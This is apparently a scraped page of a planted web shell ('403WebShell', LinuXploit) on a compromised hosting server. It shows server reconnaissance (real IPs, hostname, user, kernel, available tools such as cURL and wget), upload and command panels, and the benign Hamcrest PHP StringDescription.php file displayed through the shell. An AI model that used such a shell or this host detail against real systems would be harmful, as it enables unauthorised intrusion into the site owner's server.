Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.148.115.187
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/vendor/hamcrest/hamcrest-php/hamcrest/Hamcrest/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/vendor/hamcrest/hamcrest-php/hamcrest/Hamcrest/StringDescription.php
<?php
namespace Hamcrest;

/*
 Copyright (c) 2009 hamcrest.org
 */

/**
 * A {@link Hamcrest\Description} that is stored as a string.
 */
class StringDescription extends BaseDescription
{

    private $_out;

    public function __construct($out = '')
    {
        $this->_out = (string) $out;
    }

    public function __toString()
    {
        return $this->_out;
    }

    /**
     * Return the description of a {@link Hamcrest\SelfDescribing} object as a
     * String.
     *
     * @param \Hamcrest\SelfDescribing $selfDescribing
     *   The object to be described.
     *
     * @return string
     *   The description of the object.
     */
    public static function toString(SelfDescribing $selfDescribing)
    {
        $self = new self();

        return (string) $self->appendDescriptionOf($selfDescribing);
    }

    /**
     * Alias for {@link toString()}.
     */
    public static function asString(SelfDescribing $selfDescribing)
    {
        return self::toString($selfDescribing);
    }

    // -- Protected Methods

    protected function append($str)
    {
        $this->_out .= $str;
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit